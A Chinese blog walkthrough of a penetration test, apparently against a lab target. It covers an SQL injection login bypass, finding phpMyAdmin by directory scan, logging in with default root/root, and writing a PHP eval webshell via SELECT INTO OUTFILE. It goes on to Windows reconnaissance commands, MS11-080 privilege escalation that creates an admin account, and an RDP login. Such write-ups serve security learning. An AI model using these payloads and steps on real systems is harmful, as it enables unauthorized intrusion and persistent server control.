0x00 目标站点www.ichunqiu.com

 

0x01 尝试登陆系统

-尝试弱密码登陆

结果:forbidden!!!

尝试万能账号密码登陆

1‘ or 1=1–+ 和 1‘ or 1=1–+

结果:forbidden!!!

从登陆入口得不到其他更多的有效信息,所以从其他地方找突破口

0x02 使用御剑后台扫描工具对站点进行扫面

-开始扫描

 

-扫描得到一条目录信息:http://www.test.ichunqiu/phpmyadmin/

 

-打开扫描出来的链接,发现是phpmyadmin数据库管理程序

 

0x03 新的突破口:phpmyadmin

-得到phpmyadmin的登陆入口,当然就是想办法登陆进phpmyadmin系统

-尝试使用默认账号密码root/root进行登陆

 

-成功登陆进系统

-既然登陆进了phpmyadmin数据库的web管理页面,那也就相当于可以任意的查看整个数据库的内容,所以,尝试在数据库中去找到刚才想要登陆的系统的账号密码

-结果发现:当前web应用程序使用的数据库是个空数据库

 

0x04 利用sql语句写入webshell

-既然从数据库里面找不到登陆进后台管理页面的账号密码,所以只能从phpmyadmin提供的功能入手

-执行sql语句:select @@basedir  查询当前数据库所在的目录

-得到目录在:c:/phpstudy/mysql

 

-根据得到的数据库所在路径可以猜测,整个网站所在的根目录的路径是:C:/phpstudy/www

-既然猜测到了网站的根目录,那么尝试利用sql语句往网站根目录下写入一句话的webshell

-构造的sql语句: select “<?php eval($_POST[‘pass’])?>” into outfile “c:\\phpstudy\\www\\shell.php”

 

-成功写入webshell

0x05 使用菜刀连接webshell

 

-成功连接上:getshell

 

0x06 提权之前的信息收集

–获取主机名:
-hosname

–获取所属域信息:
-systeminfo
 

–获取系统补丁情况
-wmic qfe list   获取失败,没有权限,但是通过前面的system也能大致了解系统补丁安装情况
 

–获取本地用户组:
-net localgroup

–获取本地用户
-net user
 

–获取本地管理员信息:
-net localgroup administrators

0x07 利用exp:ms11080 获取系统管理员权限

根据前面对系统信息的收集和判断,在当前系统利用ms11080.exe来提升系统权限,使我们获得一个管理员权限的账户
-将ms11080上传至服务器的一个可读写的目录
 


-执行ms11080.exe(这个exp是一个不支持自定义命令参数的)

-成功执行exp,创建了一个具有administrator权限的90sec的管理员账户

 

0x08 利用新建的管理员账户90sec通过3389端口远程登陆进目标系统

-打开mstsc程序
 

-连接目标主机
 

-登陆目标主机

-成功通过远程桌面连接目标系统

 

版权声明:本文为ldhbetter原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/ldhbetter/p/9200885.html